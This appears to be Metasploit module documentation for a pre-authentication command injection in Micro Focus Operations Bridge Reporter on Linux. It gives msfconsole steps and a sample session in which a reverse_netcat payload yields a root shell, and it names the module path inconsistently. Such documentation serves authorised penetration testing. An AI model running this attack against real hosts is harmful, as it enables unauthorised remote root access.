Vulnerable Application
This module exploits a command injection vulnerability on login (yes, you read that right) that affects Micro Focus Operations Bridge Reporter on Linux, versions 10.40 and below. It's a straight-up command injection, with little escaping required, and it works before authentication. This module has been tested on the Linux 10.40 version. Older versions might be affected; check the advisory for details.
Installation docs are available at:
Vulnerable versions of the software can be downloaded from the Micro Focus website by requesting a demo. This vulnerability only affects Linux installations.
All details about this vulnerability can be obtained from the advisory:
Verification Steps
- Install the application
- Start msfconsole
- use exploit/multi/http/microfocus_obr_cmd_injection
- set payload PAYLOAD
- set rhost TARGET
- set lhost YOUR_IP
- run
- You should get a shell.
Scenarios
msf > use exploit/linux/http/microfocus_obr_cmd_injection
msf exploit(linux/http/microfocus_obr_cmd_injection) > set payload payload/cmd/unix/reverse_netcat
payload => cmd/unix/reverse_netcat
msf exploit(linux/http/microfocus_obr_cmd_injection) > set rhost 10.0.0.10
rhost => 10.0.0.10
msf exploit(linux/http/microfocus_obr_cmd_injection) > set lhost 10.0.0.1
lhost => 10.0.0.1
msf exploit(linux/http/microfocus_obr_cmd_injection) > run
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21412 - Payload sent, now wait for Shelly, if she doesn't arrive try again!
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:51806) at 2021-04-23 20:57:02 +0700
id
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:unconfined_service_t:s0
uname -a
Linux centos7 3.10.0-1062.18.1.el7.x86_64 #1 SMP Tue Mar 17 23:49:17 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux